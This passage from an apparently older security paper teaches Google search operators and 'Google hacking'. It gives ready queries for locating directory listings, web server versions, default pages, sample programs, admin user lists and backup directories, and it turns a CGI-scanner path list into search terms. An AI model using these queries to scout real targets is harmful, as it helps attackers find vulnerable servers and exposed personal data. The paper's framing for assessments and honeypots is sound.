This operator instructs Google to search only within the URL, or web address of a
document. This operator requires no other search arguments.
Example:
inurl:amidala
This query would display pages with the word ‘amidala’ inside the web address. One
returned result, ‘http://www.yarwood.org/kell/amidala/’ contains the word
‘amidala’ as the name of a directory. The word can appear anywhere within the web
address, including the name of the site or the name of a file. A derivative of this operator,
‘allinurl’ works in a similar fashion.
Example:
allinurl:amidala gallery
This query finds both the words ‘amidala’ and ‘gallery’ in the URL of a page. The ‘allinurl’
operator instructs Google to find every subsequent word in the query only in the URL of
the page. This is equivalent to a string of individual ‘inurl’ searches.
For a complete list of advanced operators and their usage, see
http://www.google.com/help/operators.html.
About Google’s URL syntax
The advanced Google user often streamlines the search process by use of the
Google toolbar (not discussed here) or through direct use of Google URLs. For
example, consider the URL generated by the web search for sardine:
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=sardine
First, notice that the base URL for a Google search is
“http://www.google.com/search”. The question mark denotes the end of the URL
and the beginning of the arguments to the “search” program. The “&” symbol separates
arguments. The URL presented to the user may vary depending on many factors
including whether or not the search was submitted via the toolbar, the native language of
the user, etc. Arguments to the Google search program are well documented at
http://www.google.com/apis. The arguments found in the above URL are as follows:
hl: Native language results, in this case “en” or English.
ie: Input encoding, the format of incoming data. In this case “UTF-8”.
oe: Output encoding, the format of outgoing data. In this case “UTF-8”.
q: Query. The search query submitted by the user. In this case “sardine”.
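The breakdown above can be reproduced with Python's standard urllib.parse module. This is a minimal sketch: the helper name split_search_url is hypothetical, and the URL is the sardine example from the text.

```python
from urllib.parse import urlsplit, parse_qs


def split_search_url(url):
    """Return (base URL, {argument name: value}) for a search URL."""
    parts = urlsplit(url)
    # Everything before the question mark is the base URL.
    base = f"{parts.scheme}://{parts.netloc}{parts.path}"
    # parse_qs splits the arguments on '&' and decodes each value;
    # it returns lists, so keep the first value of each argument.
    args = {name: values[0] for name, values in parse_qs(parts.query).items()}
    return base, args


url = "http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=sardine"
base, args = split_search_url(url)
print(base)
for name, value in args.items():
    print(f"{name}: {value}")
```

For the example URL this prints the base http://www.google.com/search followed by the hl, ie, oe and q arguments with the values listed above.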
Most of the arguments in this URL can be omitted.
For example, the above URL can be shortened to
http://www.google.com/search?q=sardine
making the URL much more concise. Additional search terms can be appended to the
URL with the plus sign. For example, to search for “sardine” along with “peanut” and
“butter,” consider using this URL:
http://www.google.com/search?q=sardine+peanut+butter
Since simplified Google URLs are simple to read and portable, they are often used as a
way to represent a Google search.
Google (and many other web-based programs) must represent special characters like
quotation marks in a URL with a hexadecimal number preceded by a percent (%) sign in
order to follow the http URL standard. For example, a search for “the quick brown fox”
(paying special attention to the quotation marks) is represented as
http://www.google.com/search?&q=%22the+quick+brown+fox%22
In this example, a double quote is displayed as “%22” and spaces are replaced by plus
(+) signs. Google does not exclude overly common words from phrase searches. Overly
common words are automatically included when enclosed in double-quotes.
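The encoding rules described above (spaces become plus signs, special characters become a percent sign followed by a hexadecimal number) are what Python's standard urllib.parse.urlencode applies by default. The sketch below builds simplified search URLs this way; the helper name search_url is hypothetical, and only the q argument is sent, on the assumption stated above that the other arguments can be omitted.

```python
from urllib.parse import urlencode

BASE = "http://www.google.com/search"


def search_url(query):
    """Return a simplified search URL carrying only the q argument."""
    # urlencode percent-encodes special characters (a double quote
    # becomes %22) and replaces spaces with plus signs.
    return f"{BASE}?{urlencode({'q': query})}"


print(search_url("sardine peanut butter"))
print(search_url('"the quick brown fox"'))
```

The two calls print http://www.google.com/search?q=sardine+peanut+butter and http://www.google.com/search?q=%22the+quick+brown+fox%22. Note that urlencode also encodes the colon in an advanced operator as %3A, so a query such as site:gov secret becomes q=site%3Agov+secret.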
Google hacking techniques
Domain searches using the ‘site’ operator
The site operator can be expanded to search out entire domains. For example:
site:gov secret
This query searches every web site in the .gov domain for the word ‘secret’. Notice that
the site operator works on addresses in reverse. For example, Google expects the site
operator to be used like this:
site:www.cia.gov
site:cia.gov
site:gov
Google would not necessarily expect the site operator to be used like this:
site:www.cia
site:www
site:cia
The reason for this is simple. ‘Cia’ and ‘www’ are not valid top-level domain names. This
means that as of this writing, Internet names may not end in ‘cia’ or ‘www’. However,
sending unexpected queries like these is part of a competent Google hacker’s arsenal
as we explore in the “googleturds” section.
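Because the ‘site’ operator matches from the right-hand end of a host name, the queries Google expects for a given host can be generated by dropping labels from the left one at a time. A minimal Python sketch, with the hypothetical helper name site_queries:

```python
def site_queries(hostname):
    """List the 'site:' queries for a host, from most to least specific."""
    labels = hostname.lower().strip(".").split(".")
    # Drop leading labels one at a time so every query still ends
    # in the top-level domain.
    return ["site:" + ".".join(labels[i:]) for i in range(len(labels))]


print(site_queries("www.cia.gov"))
```

For www.cia.gov this yields site:www.cia.gov, site:cia.gov and site:gov, the three forms listed above. Forms such as site:www.cia or site:cia never appear, since they do not end in a top-level domain.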
How this technique can be used
1. Journalists, snoops and busybodies in general can use this technique to find
interesting ‘dirt’ about a group of websites owned by organizations such as a
government or non-profit organization. Remember that top-level domain names
are often very descriptive and can include interesting groups such as: the U.S.
Government (.gov or .us)
2. Hackers searching for targets. If a hacker harbors a grudge against a specific
country or organization, he can use this type of search to find sensitive targets.
Finding ‘googleturds’ using the ‘site’ operator
Googleturds, as I have named them, are little dirty pieces of Google ‘waste’. These
search results seem to have stemmed from typos Google found while crawling a web
page. Example:
site:csc
site:microsoft
Neither of these queries is valid according to the loose rules of the ‘site’ operator, since
they do not end in valid top-level domain names. However, these queries produce
interesting results as shown in Figure 7.
Figure 7: Googleturd example
These little bits of information are most likely the results of typographical errors in links
placed on web pages.
How this technique can be used
Hackers investigating a target can use munged site values based on the target’s name
to dig up Google pages (and subsequently potentially sensitive data) that may not be
available to Google searches using the valid ‘site’ operator. Example: A hacker is
interested in sensitive information about ABCD Corporation, located on the web at
www.ABCD.com. Using a query like ‘site:ABCD’ may find mistyped links
(http://www.abcd instead of http://www.abcd.com) containing interesting information.
Site mapping: More about the ‘site’ operator
Mapping the contents of a web server via Google is simple. Consider the following
query:
site:www.microsoft.com microsoft
This query searches for the word ‘microsoft’, restricting the search to the
www.microsoft.com web site. How many pages on the Microsoft web server contain the
word ‘microsoft?’ According to Google, all of them! Remember that Google searches not
only the content of a page, but the title and URL as well. The word ‘microsoft’ appears in
the URL of every page on www.microsoft.com. With one single query, an attacker gains
a rundown of every web page on a site cached by Google.
There are some exceptions to this rule. If a link on the Microsoft web page points back to
the IP address of the Microsoft web server, Google will cache that page as belonging to
the IP address, not the www.microsoft.com web server. In this special case, an attacker
would simply alter the query, replacing the word ‘microsoft’ with the IP address(es) of the
Microsoft web server.
Google has recently added an additional method of accomplishing this task. This
technique allows Google users to simply enter a ‘site’ query alone. Example:
site:microsoft.com
This technique is simpler, but I’m not sure if this search technique is a permanent
Google feature.
Since Google only follows links that it finds on the Web, don’t expect this technique to
return every single web page hosted on a web server.
How this technique can be used
This technique makes it very simple for any interested party to get a complete rundown
of a website’s structure without ever visiting the website directly. Since Google searches
occur on Google’s servers, it stands to reason that only Google has a record of that
search. The process of viewing cached pages from Google can also be safe as long as
the Google hacker takes special care not to allow his browser to load linked content
such as images from that cached page. For a competent attacker, this is a trivial
exercise. Simply put, Google allows for a great deal of target reconnaissance that results
in little or no exposure for the attacker.
Finding Directory listings
Directory listings provide a list of files and directories in a browser window instead of the
typical text-and-graphics mix generally associated with web pages. Figure 8 shows a
typical directory listing.
Figure 8: A typical directory listing
Directory listings are often placed on web servers purposely to allow visitors to browse
and download files from a directory tree. Many times, however, directory listings are not
intentional. A misconfigured web server may produce a directory listing if an index, or
main web page file is missing. In some cases, directory listings are set up as a
temporary storage location for files. Either way, there’s a good chance that an attacker
may find something interesting inside a directory listing.
Locating directory listings with Google is fairly straightforward. Figure 8 shows that most
directory listings begin with the phrase “Index of”, which also shows in the title. An
obvious query to find this type of page might be “intitle:index.of”, which may find
pages with the term ‘index of’ in the title of the document. Remember that the period (.)
serves as a single-character wildcard in Google. Unfortunately, this query will return a
large number of false-positives such as pages with the following titles:
Index of Native American Resources on the Internet
LibDex - Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources
Judging from the titles of these documents, it is obvious that not only are these web
pages intentional, they are also not the directory listings we are looking for. (*jedi wave*
“This is not the directory listing you’re looking for.”) Several alternate queries provide
more accurate results:
intitle:index.of "parent directory"
intitle:index.of name size
These queries indeed provide directory listings by not only focusing on “index.of” in the
title, but on key words often found inside directory listings such as “parent directory”
“name” and “size.”
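The reasoning behind the refined queries can be illustrated offline. The Python sketch below applies the same two conditions to page text: “index of” in the title, plus either “parent directory” or both “name” and “size” in the body. It is only a rough heuristic written for illustration and says nothing about how Google itself matches pages. The function name looks_like_listing is hypothetical, the first three titles are the false positives quoted above, and every body snippet and the final “Index of /backup” page are invented sample data.

```python
def looks_like_listing(title, body):
    """Heuristic: 'index of' in the title plus listing keywords in the body."""
    title, body = title.lower(), body.lower()
    if "index of" not in title:
        return False
    has_parent = "parent directory" in body
    has_columns = "name" in body and "size" in body
    return has_parent or has_columns


# Titles 1-3 come from the text; all body snippets and the last
# title are invented sample data.
pages = [
    ("Index of Native American Resources on the Internet", "Links to tribal home pages"),
    ("LibDex - Worldwide index of library catalogues", "Browse libraries by country"),
    ("Iowa State Entomology Index of Internet Resources", "Insect-related web sites"),
    ("Index of /backup", "Name Last modified Size Description Parent Directory"),
]

for title, body in pages:
    print(looks_like_listing(title, body), title)
```

With this sample data only the last page passes, since the three false positives match on the title but lack the listing keywords in the body.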
How this technique can be used
Bear in mind that many directory listings are intentional. However, directory listings
provide the Google hacker a very handy way to quickly navigate through a site. For the
purposes of finding sensitive or interesting information, browsing through lists of file and
directory names can be much more productive than surfing through the guided content
of web pages. Directory listings provide a means of exploiting other techniques such as
versioning and file searching, explained below.
Versioning: Obtaining the Web Server Software / Version
via directory listings
The exact version of the web server software running on a server is one piece of
information an attacker requires before launching a successful attack against
that web server. If an attacker connects directly to that web server, the HTTP (web)
headers from that server can provide this information. It is possible, however, to retrieve
similar information from Google without ever connecting to the target server under
investigation. One method involves using the information provided in a directory
listing.
Figure 9: Directory listing "server.at" example
Figure 9 shows the bottom line of a typical directory listing. Notice that the directory
listing includes the name of the server software as well as the version. An adept web
administrator can fake this information, but this information is often legitimate, allowing
an attacker to determine what attacks may work against the server. This example was
gathered using the following query:
intitle:index.of server.at
This query focuses on the term “index of” in the title and “server at” appearing at the
bottom of the directory listing. This type of query can additionally be pointed at a
particular web server:
intitle:index.of server.at site:aol.com
The result of this query indicates that gprojects.web.aol.com and vidup-r1.blue.aol.com
both run Apache web servers.
intitle:index.of server.at site:apple.com
The result of this query indicates that mirror.apple.com runs an Apache web server. This
technique can also be used to find servers running a particular version of a web server.
For example:
intitle:index.of "Apache/1.3.0 Server at"
This query will find servers with directory listings enabled that are running Apache
version 1.3.0.
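Once a directory listing has been retrieved (from Google's cache, for example), the server tag at the bottom can be pulled apart mechanically. The Python sketch below assumes the tag has the form “Product/Version ... Server at host Port N”. The product, version and “Server at” parts follow the queries above, while the trailing “Port N” part and both sample lines are assumptions made for illustration. The helper names parse_server_footer and version_query are hypothetical.

```python
import re

# Assumed footer shape: "Apache/1.3.0 Server at www.example.com Port 80",
# optionally with extra module tokens between the version and "Server at".
FOOTER = re.compile(
    r"(?P<product>[A-Za-z][\w-]*)/(?P<version>\d+(?:\.\d+)*)\b"
    r".*?\bServer at (?P<host>\S+) Port (?P<port>\d+)"
)


def parse_server_footer(line):
    """Return product, version, host and port from a footer line, or None."""
    match = FOOTER.search(line)
    if match is None:
        return None
    info = match.groupdict()
    info["port"] = int(info["port"])
    return info


def version_query(product, version):
    """Build the version-specific directory listing query."""
    return f'intitle:index.of "{product}/{version} Server at"'


print(parse_server_footer("Apache/1.3.0 Server at www.example.com Port 80"))
print(version_query("Apache", "1.3.0"))
```

The second call reproduces the Apache 1.3.0 query shown above. A line that does not carry a server tag makes parse_server_footer return None, which corresponds to the case where the stamp at the bottom of the listing is missing.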
How this technique can be used
This technique is somewhat limited by the fact that the target must have at least one
page that produces a directory listing, and that listing must have the server version
stamped at the bottom of the page. There are more advanced techniques that can be
employed if the server ‘stamp’ at the bottom of the page is missing. One such approach
is a ‘profiling’ technique that focuses on the headers, title, and overall
format of the directory listing to observe clues as to what web server software is running.
By comparing known directory listing formats to the target’s directory listing format, a
competent Google hacker can generally nail the server version fairly quickly. This
technique is also flawed in that most servers allow directory listings to be completely
customized, making a match difficult. Some directory listings are not under the control of
the web server at all but instead rely on third-party software. In this particular case, it
may be possible to identify the third party software running by focusing on the source
(‘view source’ in most browsers) of the directory listing’s web page or by using the
profiling technique listed above.
Regardless of how likely it is to determine the web server version of a specific server
using this technique, hackers (especially web defacers) can use this technique to troll
Google for potential victims. If a hacker has an exploit that works against, say Apache
1.3.0, he can quickly scan Google for victims with a simple search like
‘intitle:index.of "Apache/1.3.0 Server at"’. This would return a list of
servers that have at least one directory listing with the Apache 1.3.0 server tag at the
bottom of the listing. This technique can be used for any web server that tags directory
listings with the server version, as long as the attacker knows in advance what that tag
might look like.
via default pages
It is also possible to determine the version of a web server based on default pages.
When a web server is installed, it generally will ship with a set of default web pages, like
the Apache 1.2.6 page shown in Figure 10.
Figure 10: Apache test page
These pages can make it easy for a site administrator to get a web server running. By
providing a simple page to test, the administrator can simply connect to his own web
server with a browser to validate that the web server was installed correctly. Some
operating systems even come with web server software already installed. In this case,
an Internet user may not even realize that a web server is running on his machine. This
type of casual behavior on the part of an Internet user will lead an attacker to rightly
assume that the web server is not well maintained and is, by extension insecure. By
further extension, the attacker can also assume that the entire operating system of the
server may be vulnerable by virtue of poor maintenance.
How this technique can be used
A simple query of “intitle:Test.Page.for.Apache it.worked!” will return a list
of sites running Apache 1.2.6 with a default home page. Other queries will return similar
Apache results:
Apache server version     Query
Apache 1.3.0 – 1.3.9      intitle:Test.Page.for.Apache It.worked! this.web.site!
Apache 1.3.11 – 1.3.26    intitle:Test.Page.for.Apache seeing.this.instead
Apache 2.0                intitle:Simple.page.for.Apache Apache.Hook.Functions
Apache SSL/TLS            intitle:test.page "Hey, it worked !" "SSL/TLS-aware"
Microsoft’s Internet Information Services (IIS) also ships with default web pages as
shown in Figure 11.
Figure 11: IIS 5.0 default web page
Queries that will locate default IIS web pages include:
IIS Server Version    Query
Many                  intitle:welcome.to intitle:internet IIS
Unknown               intitle:"Under construction" "does not currently have"
IIS 4.0               intitle:welcome.to.IIS.4.0
IIS 4.0               allintitle:Welcome to Windows NT 4.0 Option Pack
IIS 4.0               allintitle:Welcome to Internet Information Server
IIS 5.0               allintitle:Welcome to Windows 2000 Internet Services
IIS 6.0               allintitle:Welcome to Windows XP Server Internet Services
In the case of Microsoft-based web servers, it is not only possible to determine web
server version, but operating system and service pack version as well. This information is
invaluable to an attacker bent on hacking not only the web server, but hacking beyond
the web server and into the operating system itself. In most cases, an attacker with
control of the operating system can wreak more havoc on a machine than a hacker that
only controls the web server.
Netscape Servers also ship with default pages as shown in Figure 12.
Figure 12: Netscape Enterprise Server default page
Some queries that will locate default Netscape web pages include:
Netscape Server Version    Query
Many                       allintitle:Netscape Enterprise Server Home Page
Unknown                    allintitle:Netscape FastTrack Server Home Page
Some queries to find more esoteric web servers/applications include:
Server / Version             Query
Jigsaw / 2.2.3               intitle:"jigsaw overview" "this is your"
Jigsaw / Many                intitle:"jigsaw overview"
iPlanet / Many               intitle:"web server, enterprise edition"
Resin / Many                 allintitle:Resin Default Home Page
Resin / Enterprise           allintitle:Resin-Enterprise Default Home Page
JWS / 1.0.3 – 2.0            allintitle:default home page java web server
J2EE / Many                  intitle:"default j2ee home page"
KFSensor honeypot            "KF Web Server Home Page"
Kwiki                        "Congratulations! You've created a new Kwiki website."
Matrix Appliance             "Welcome to your domain web page" matrix
HP appliance sa1*            intitle:"default domain page" "congratulations" "hp web"
Intel Netstructure           "congratulations on choosing" intel netstructure
Generic Appliance            "default web page" congratulations "hosting appliance"
Debian Apache                intitle:"Welcome to Your New Home Page!" debian
Cisco Micro Webserver 200    "micro webserver home page"
via manuals, help pages and sample programs
Another method of determining server version involves searching for manuals, help
pages or sample programs which may be installed on the website by default. Many web
server distributions install manual pages and sample programs in default locations. Over
the years, hackers have found many ways to exploit these default web applications to
gain privileged access to the web server. Because of this, most web server vendors
insist that administrators remove this sample code before placing a server on the
Internet. Regardless of the potential vulnerability of such programs, the mere existence
of these programs can help determine the web server type and version. Google can
stumble on these directories via a default-installed webpage or other means.
How this technique can be used
In addition to determining the web server version of a specific target, hackers can use
this technique to find vulnerable targets.
Example:
inurl:manual apache directives modules
This query returns pages that host the Apache web server manuals. The Apache
manuals are included in the default installation package of many different versions of
Apache. Different versions of Apache may have different styles of manual, and the
location of manuals may differ, if they are installed at all. As evidenced in Figure 13, the
server version is reported at the top of the manual page. This may not reflect the current
version of the web server if the server has been upgraded since the original installation.
Figure 13: Determining server version via server manuals
Microsoft’s IIS often deploys manuals (termed ‘help pages’) with various versions of the
web server. One way to search for these default help pages is with a query like
‘allinurl:iishelp core’.
Many versions of IIS optionally install sample applications. Often, these sample
applications are included in a directory called ‘iissamples,’ which may be discovered
using a query like ‘inurl:iissamples’. In addition, the name of a sample program
can be included in the query, such as ‘inurl:iissamples advquery.asp’, as shown
in Figure 14.
Figure 14: An IIS server with default sample code installed
Many times, subdirectories may exist inside the samples directory. A page with both the
‘iissamples’ directory and the ‘sdk’ directory can be found with a query like
‘inurl:iissamples sdk’.
There are many more combinations of default manual, help pages and sample programs
that can be searched for. As mentioned above, these programs often contain
vulnerabilities. Searching for vulnerable programs is yet another trick of the Google
hacker.
Using Google as a CGI scanner
The ‘CGI scanner’ or ‘web scanner’ has become one of the most indispensable tools in
the world of web server hacking. Mercilessly searching out vulnerable programs on a
server, these programs help pinpoint potential avenues for attack. These programs are
brutally obvious, incredibly noisy and fairly accurate tools. However, the accomplished
Google hacker knows there are more subtle and interesting ways to attempt the same
task.
In order to accomplish their task, these scanners must know exactly what to search for
on a web server. In most cases these tools scan web servers looking for vulnerable
files, or for directories that may contain sample code or vulnerable files. Either
way, the tools generally store these vulnerabilities in a file that is formatted like the
following excerpt:
/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi
/iissamples/ISSamples/SQLQHit.asp
/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi
How this technique can be used
The lines in a vulnerability file like the one shown above can serve as a roadmap for a
Google hacker. Each line can be broken down and used in either an ‘index.of’ or an
‘inurl’ search to find vulnerable targets. For example, a Google search for
‘allinurl:/random_banner/index.cgi’ returns the results shown in Figure 15.
Figure 15: Example search using a line from a CGI scanner
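The breakdown described above can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the function name is hypothetical, and the exact form of the ‘index.of’ query (the file name quoted after intitle:index.of) is one plausible choice rather than a prescribed one. The code only builds query strings; it sends nothing to Google.

```python
import posixpath


def scanner_lines_to_queries(lines):
    """Turn CGI-scanner path entries into Google query strings."""
    seen = set()
    queries = []
    for raw in lines:
        path = raw.strip()
        if not path or path in seen:
            continue  # skip blank lines and repeated entries
        seen.add(path)
        # 'inurl'-style search on the full path
        queries.append("allinurl:" + path)
        # 'index.of'-style search on the file name (assumed query form)
        filename = posixpath.basename(path)
        if filename:
            queries.append('intitle:index.of "' + filename + '"')
    return queries


excerpt = [
    "/random_banner/index.cgi",
    "/random_banner/index.cgi",
    "/cgi-bin/finger.cgi",
]
for query in scanner_lines_to_queries(excerpt):
    print(query)
```

Repeated entries are dropped so that each vulnerable path produces its queries only once.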
A hacker can take sites returned from this Google search, apply a bit of hacker ‘magic’
and eventually get the broken ‘random_banner’ program to cough up any file on that
web server, including the password file as shown in Figure 16.
Figure 16: password file captured from a vulnerable site found using a Google search
Of the many Google hacking techniques we’ve looked at, this technique is one of the
best candidates for automation since the CGI scanner vulnerability files can be very
large. The gooscan tool, written by j0hnny, performs this and many other functions.
Gooscan and automation are discussed later.
Using Google to find interesting files and directories
Using Google to find vulnerable targets can be very rewarding. However, it is often more
rewarding to find not only vulnerabilities but also sensitive data that is not meant for
public viewing. People and organizations leave this type of data on web servers all the
time (trust me, I’ve found quite a bit of it). Now remember, Google is only crawling a
small percentage of the pages that contain this type of data, but the tradeoff is that
Google’s data can be retrieved from Google quickly, quietly and without much fuss.
It is not uncommon to find sensitive data such as financial information, social security
numbers, medical information, and the like.
How this technique can be used
Of all the techniques examined thus far, this technique is the hardest to describe because
it takes a bit of imagination and sometimes just a bit of luck. Often the best way to find
sensitive files and directories is to find them in the context of other “important” words and
phrases.
Example:
Consider the fact that many people store an entire hodgepodge of data inside backup
directories. Often, the entire content of a web server or personal computer can be
found in a directory called backup. Using a simple query like “inurl:backup” can
yield potential backup directories, yet refining the search to something like
“inurl:backup intitle:index.of inurl:admin” can reveal even more
relevant results.
A query like “inurl:admin” can often reveal administrative directories. Several
combinations of this query are often fruitful. For example:
“inurl:admin intitle:login” can reveal admin login pages
“inurl:admin filetype:xls” can reveal interesting Excel spreadsheets either
named “admin” or stored in a directory named “admin”. Educational institutions are
notorious for falling victim to this search.
“inurl:admin inurl:userlist” is a generic catch-all query which finds many
different types of administrative userlist pages. These results may take some sorting
through, but the benefits are certainly worth it, as results include usernames,
passwords, phone numbers, addresses and more.
“inurl:admin filetype:asp inurl:userlist” will find more specific examples
of an administrator’s user list function, this time written in an ASP page. In most cases,
these types of pages do not require authentication.
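For an administrator checking his own exposure, the four queries above can be combined with the ‘site’ operator described earlier. The sketch below only assembles the query strings; the function name and the example domain are placeholders, not part of any tool.

```python
# The four admin-related queries listed above.
ADMIN_QUERIES = [
    "inurl:admin intitle:login",
    "inurl:admin filetype:xls",
    "inurl:admin inurl:userlist",
    "inurl:admin filetype:asp inurl:userlist",
]


def audit_queries(domain):
    """Restrict each admin query to a single domain with the 'site' operator."""
    return ["site:{} {}".format(domain, query) for query in ADMIN_QUERIES]


for query in audit_queries("example.com"):
    print(query)
```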
About Google automated scanning
With so many potential search combinations available, it’s obvious that an automated
tool scanning for a known list of potentially dangerous pages would be extremely useful.
However, Google frowns on such automation as quoted at
http://www.google.com/terms_of_service.html:
“You may not send automated queries of any sort to Google's system without
express permission in advance from Google. Note that "sending automated
queries" includes, among other things:
• using any software which sends queries to Google to determine how a
website or webpage "ranks" on Google for various queries;
• "meta-searching" Google; and
• performing "offline" searches on Google.”
Google does offer an alternative in the form of the Google Web APIs found at
http://www.google.com/apis/. There are several major drawbacks to the Google API
program at the time of this writing. First, users and developers of Google API programs
must both have Google license keys. This puts a damper on the potential user base of
Google API programs. Second, API-created programs are limited to 1,000 queries per
day since “The Google Web APIs service is an experimental free program, so the
resources available to support the program are limited” (according to the API FAQ found
at http://www.google.com/apis/api_faq.html#gen12). With so many potential searches,
1,000 queries per day is simply not enough.
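To put the daily limit in perspective, a quick calculation shows how long a scan would take under the API quota. The figure of 2,500 queries is a made-up example, not a measurement of any real signature list.

```python
import math


def days_needed(total_queries, daily_limit=1000):
    """Days required to run total_queries under a per-day query limit."""
    return math.ceil(total_queries / daily_limit)


# Hypothetical scan: 2,500 queries at 1,000 queries per day.
print(days_needed(2500))
```

Scanning several sites multiplies the total, since each site needs its own pass through the list.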
The bottom line is that any user running an automated Google querying tool (with the
exception of API created tools) must obtain express permission in advance to do so. It is
unknown what the consequences of ignoring these terms of service are, but it seems
best to stay on Google’s good side.
The only exception to this rule appears to be the Google search appliance (described
below). The Google search appliance does not have the same automated query
restrictions since the end user, not Google, owns the appliance. One should, however,
obtain advance express permission from the owner or maintainer of the Google
appliance before searching it with any automated tool for various legal and moral
reasons.
Other Google stuff
Google Appliances
The Google search appliance is described at http://www.google.com/appliance/:
“Now the same reliable results you expect from Google web search can be yours
on your corporate website with the Google Search Appliance. This combined
hardware and software solution is easy to use, simple to deploy, and can be up
and running on your intranet and public website in just a few short hours.”
The Google appliance can best be described as a locally controlled and operated
mini-Google search engine for individuals and corporations. When querying a Google
appliance, the queries listed above in the “URL Syntax” section often will not work.
Extra parameters are often required to perform a manual appliance query. Consider
running a search for "Steve Hansen" at the Google appliance found at Stanford. After
entering this search into the Stanford search page, the user is whisked away to a page
with this URL (chopped for readability):
http://find.stanford.edu/search?q=steve+hansen
&site=stanford&client=stanford&proxystylesheet=stanford
&output=xml_no_dtd&as_dt=i&as_sitesearch=
Breaking this up into chunks reveals three distinct pieces. First, the target appliance is
find.stanford.edu. Next, the query is "steve hansen" or "steve+hansen" and
last but not least are all the extra parameters:
&site=stanford&client=stanford&proxystylesheet=stanford
&output=xml_no_dtd&as_dt=i&as_sitesearch=
These parameters may differ from appliance to appliance, but it has become clear that
there are several default parameters that are required from a default installation of the
Google appliance like the one found at find.stanford.edu.
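The three pieces can also be pulled apart programmatically. The following sketch uses Python's standard urllib.parse module on the Stanford URL shown above; the function name is hypothetical.

```python
from urllib.parse import urlsplit, parse_qsl

# The appliance URL from the example above, rejoined into one string.
APPLIANCE_URL = (
    "http://find.stanford.edu/search?q=steve+hansen"
    "&site=stanford&client=stanford&proxystylesheet=stanford"
    "&output=xml_no_dtd&as_dt=i&as_sitesearch="
)


def split_appliance_url(url):
    """Return (target appliance, search query, extra parameters)."""
    parts = urlsplit(url)
    # keep_blank_values preserves empty parameters such as as_sitesearch=
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    query = params.pop("q", "")
    return parts.netloc, query, params


host, query, extras = split_appliance_url(APPLIANCE_URL)
print(host)
print(query)
print(extras)
```

Keeping the extra parameters in a dictionary makes it easy to reuse them unchanged when building a new query for the same appliance.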
Googledorks
The term “googledork” was coined by Johnny Long (http://johnny.ihackstuff.com) and
originally meant “An inept or foolish person as revealed by Google.” After a great deal of
media attention, the term came to describe those “who troll the Internet for confidential
goods.” Either term is fine, really. What matters is that the term googledork conveys the
concept that sensitive stuff is on the web, and Google can help you find it. The official
googledorks page (found at http://johnny.ihackstuff.com/googledorks) lists many different
examples of unbelievable things that have been dug up through Google by the
maintainer of the page, Johnny Long. Each listing shows the Google search required to
find the information along with a description of why the data found on each page is so
interesting.
Gooscan
Gooscan (http://johnny.ihackstuff.com) is a UNIX (Linux/BSD/Mac OS X) tool that
automates queries against Google search appliances, but with a twist. These particular
queries are designed to find potential vulnerabilities on web pages. Think "cgi scanner"
that never communicates directly with the target web server, since all queries are sent to
Google, not to the target. For the security professional, gooscan serves as a front-end
for an external server assessment and aids in the "information gathering" phase of a
vulnerability assessment. For the web server administrator, gooscan helps discover what
the web community may already know about a site thanks to Google.
Gooscan was not written using the Google API. This raises questions about the “legality”
of using gooscan as a Google scanner. Is gooscan “legal” to use? You should not use
this tool to query Google without advance express permission. Google appliances
do not have these limitations. You should, however, obtain advance express
permission from the owner or maintainer of the Google appliance before searching it
with any automated tool for various legal and moral reasons. Only use this tool to
query appliances unless you are prepared to face the (as yet unquantified) wrath
of Google.
Although there are many features, the gooscan tool’s primary purpose is to scan Google
(as long as you obtain advance express permission from Google) or Google appliances
(as long as you have advance express permission from the owner/maintainer) for the
items listed on the googledorks page. In addition, the tool allows for a very thorough CGI
scan of a site through Google (as long as you obtain advance express permission from
Google) or a Google appliance (as long as you have advance express permission from
the owner/maintainer of the appliance). Have I made myself clear about how this tool is
intended to be used? Get permission! =) Once you have received the proper advance
express permission, gooscan makes it easy to measure the Google exposure of yourself
or your clients.
GooPot
The concept of a honeypot is very straightforward. According to techtarget.com:
“A honey pot is a computer system on the Internet that is expressly set up to
attract and ‘trap’ people who attempt to penetrate other people's computer
systems.”
In order to learn about how new attacks might be conducted, the maintainers of a
honeypot system monitor, dissect and catalog each attack, focusing on those attacks
which seem unique.
An extension of the classic honeypot system, a web-based honeypot or “pagepot” is
designed to attract those employing the techniques outlined in this paper. The concept is
fairly straightforward. A simple googledork entry like “inurl:admin
inurl:userlist” could easily be replicated with a web-based honeypot by creating
an index.html page which referenced another index.html file in an /admin/userlist
directory. If a web search engine like Google was instructed to crawl the top-level
index.html page, it would eventually find the link pointing to /admin/userlist/index.html.
This link would satisfy the Google query “inurl:admin inurl:userlist”,
eventually attracting a curious Google searcher.
Once the Google searcher clicks on the Google result, he is whisked away to the target
web page. In the background, the user’s web browser also sends many variables to that
web server, including one variable of interest, the “referrer” variable (the HTTP
Referer header). This field contains the complete address of the web page that was
visited previously, or more clearly, the page that referred the user to the web page.
The bottom line is that this variable can be
inspected to figure out how a web surfer found a web page assuming they clicked on
that link from a search engine page. This bit of information is critical to the maintainer of
a pagepot system, since it outlines the exact method the Google searcher used to locate
the pagepot system. The information aids in protecting other web sites from similar
queries.
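A minimal sketch of that inspection follows. It assumes the referring search page carries the search terms in a ‘q’ parameter, as in the URL examples elsewhere in this paper; the function name and the sample referrer are invented for illustration.

```python
from urllib.parse import urlsplit, parse_qs


def search_terms_from_referrer(referrer):
    """Return the Google search terms in a referrer value, or None."""
    parts = urlsplit(referrer)
    if "google." not in parts.netloc.lower():
        return None  # the visitor did not arrive from a Google page
    values = parse_qs(parts.query).get("q")
    return values[0] if values else None


# Hypothetical referrer value as a pagepot might record it.
sample = "http://www.google.com/search?q=inurl%3Aadmin+inurl%3Auserlist"
print(search_terms_from_referrer(sample))
```

Logging the recovered search terms for every hit gives the pagepot maintainer a running list of the queries used to find the site.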
The concept of a pagepot is not a new one thanks to many folks including the group at
http://www.gray-world.net/. Their web-based honeypot, hosted at
http://www.gray-world.net/etc/passwd/, is designed to entice those using Google like a CGI scanner. This
is not a bad concept, but as we’ve seen in this paper, there are so many other ways to
use Google to find vulnerable or sensitive pages.
Enter GooPot, the Google honeypot system designed by johnny@ihackstuff.com. By
populating a web server with sensitive-looking documents and monitoring the referrer
